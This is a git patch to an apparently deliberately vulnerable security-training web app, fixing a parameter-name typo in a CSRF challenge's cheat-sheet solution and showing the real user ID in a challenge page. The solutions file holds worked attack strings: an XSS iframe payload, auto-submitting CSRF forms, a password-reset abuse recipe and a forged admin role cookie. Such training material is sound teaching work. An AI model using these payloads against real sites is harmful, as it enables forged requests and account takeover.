From 8ce592b208a824689755bca1111d7b8b51f9c6c8 Mon Sep 17 00:00:00 2001 From: ismisepaul Date: Sat, 16 Apr 2022 21:18:40 +0100 Subject: [PATCH] fixing csrf challenge 2 where id was not displayed and cheat had a typo --- src/main/resources/i18n/cheatsheets/solutions.properties | 2 +- ...98a13604705d608fb3171ebf49bc18753b0ec34b8dff5e4f9147eb5e.jsp | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/src/main/resources/i18n/cheatsheets/solutions.properties b/src/main/resources/i18n/cheatsheets/solutions.properties index d9f13ff03..e068da23a 100644 --- a/src/main/resources/i18n/cheatsheets/solutions.properties +++ b/src/main/resources/i18n/cheatsheets/solutions.properties @@ -2,7 +2,7 @@ 453d22238401e0bf6f1ff5d45996407e98e45b07.solution = To complete the lesson, the attack string is the following:
"https://hostname:port/root/grantComplete/csrfLesson?userId=tempId" cd7f70faed73d2457219b951e714ebe5775515d8.solution = Input is being filtered. To complete this challenge, enter the following attack string:
<iframe src='#' onload='alert("XSS")'></iframe> 2dc909fd89c2b03059b1512e7b54ce5d1aaa4bb4.solution = The user Ids in this challenge follow a sequence 1,3,5 etc. The Hidden Users ID is 11 -94cd2de560d89ef59fc450ecc647ff4d4a55c15d.solution = To complete this challenge, you must force another user to submit a post request. The easiest way to achieve this is to force the user to visit a custom webpage that submits the post request. This means the webpage needs to be accessible. It can be accessed via a HTTP server, a public Dropbox link, a shared file area. The following is an example webpage that would complete the challenge

<html>
<body>
<form id="completeChallenge2" action="https://hostname:port/user/csrfchallengetwo/plusplus" method="POST" >
<input type="hidden" name="userid" value="exampleId" />
<input type="submit"/>
</form>
<script>
document.forms["completeChallenge2"].submit();
</script>
</body>
</html>

The class form function should be used to create an iframe that forces the user to visit this attack page. +94cd2de560d89ef59fc450ecc647ff4d4a55c15d.solution = To complete this challenge, you must force another user to submit a post request. The easiest way to achieve this is to force the user to visit a custom webpage that submits the post request. This means the webpage needs to be accessible. It can be accessed via a HTTP server, a public Dropbox link, a shared file area. The following is an example webpage that would complete the challenge

<html>
<body>
<form id="completeChallenge2" action="https://hostname:port/user/csrfchallengetwo/plusplus" method="POST" >
<input type="hidden" name="userId" value="exampleId" />
<input type="submit"/>
</form>
<script>
document.forms["completeChallenge2"].submit();
</script>
</body>
</html>

The class form function should be used to create an iframe that forces the user to visit this attack page. b70a84f159876bb9885b6e0087d22f0a52abbfcf.solution = Use the login function with usernames like admin, administrator, root, etc to find administrator email accounts. Use the forgotten password functionality to change the password for the email address recovered. Inspect the response of the password reset request to see what the password was reset to. Use this password to login! a4bf43f2ba5ced041b03d0b3f9fa3541c520d65d.solution = Base 64 Decode the "checksum" cookie in the request to find it equals "userRole=user". Change the value of userRole to be administrator instead. The cookies new value should be "dXNlclJvbGU9YWRtaW5pc3RyYXRvcg==" when you replace it. 5ca9115f3279b9b9f3308eb6a59a4fcd374846d6.solution = To complete this challenge, you must force an admin to submit a post request. The easiest way to achieve this is to force the admin to visit a custom webpage that submits the post request. This means the webpage needs to be accessible. It can be accessed via a HTTP server, a public Dropbox link, a shared file area. The following is an example webpage that would complete the challenge

<html>
<body>
<form id="completeChallenge3" action="https://hostname:port/user/csrfchallengethree/plusplus" method="POST" >
<input type="hidden" name="userid" value="exampleId" />
<input type="hidden" name="csrfToken" value="anythingExceptNull" />
<input type="submit"/>
</form>
<script>
document.forms["completeChallenge3"].submit();
</script>
</body>
</html>

The class form function should be used to create an iframe that forces the admin to visit this attack page. diff --git a/src/main/webapp/challenges/z311736498a13604705d608fb3171ebf49bc18753b0ec34b8dff5e4f9147eb5e.jsp b/src/main/webapp/challenges/z311736498a13604705d608fb3171ebf49bc18753b0ec34b8dff5e4f9147eb5e.jsp index b555566e1..4b43dac6c 100644 --- a/src/main/webapp/challenges/z311736498a13604705d608fb3171ebf49bc18753b0ec34b8dff5e4f9147eb5e.jsp +++ b/src/main/webapp/challenges/z311736498a13604705d608fb3171ebf49bc18753b0ec34b8dff5e4f9147eb5e.jsp @@ -84,7 +84,7 @@ <%= bundle.getString("challenge.intro") %>

POST /user/csrfchallengetwo/plusplus
<%= bundle.getString("challenge.withThisParameter") %> - userId = <%= bundle.getString("challenge.userIdExample") %>
+ userId = <%= userId %>

<%= bundle.getString("challenge.whereIdIsUserBeenIncremented.1") %> <%= bundle.getString("challenge.userIdExample") %> <%= bundle.getString("challenge.whereIdIsUserBeenIncremented.2") %>